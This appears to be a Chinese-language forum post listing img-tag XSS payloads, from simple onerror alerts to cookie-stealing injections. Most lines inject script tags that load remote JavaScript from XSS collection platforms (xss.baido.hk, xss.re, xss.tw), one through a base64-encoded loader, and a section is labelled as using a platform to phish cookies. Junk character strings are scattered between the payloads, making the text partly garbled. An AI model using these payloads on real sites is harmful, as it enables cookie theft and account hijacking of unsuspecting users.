img标签的常用几种测试手段

admin

<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
0 ?1 H  S+ V& d3 |<img src=# onerror=alert(document.cookie)>
下面是利用平台钓cookie的
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
( `7 R* u5 U& I# f
  o4 w* C3 o0 m0 p  n
8 b5 G  Y4 V0 M- p7 P<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
2 j, C5 l3 O; f- l- \, u<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
7 a& n3 p$ s7 B% `! K7 S“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
" G- c) O6 \% N9 g; ^1 b( X' o<img src="#">
0 n* i6 D7 Q7 j, U<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
, K7 U5 x- z2 h; Q6 ~<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
% P+ r0 p5 D' S1 ?$ M% l$ i<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
# a- j* S1 e( J7 F* g& h& o8 U<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
3 M/ c7 e: o" s$ X<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
) y- y* v$ f. H* N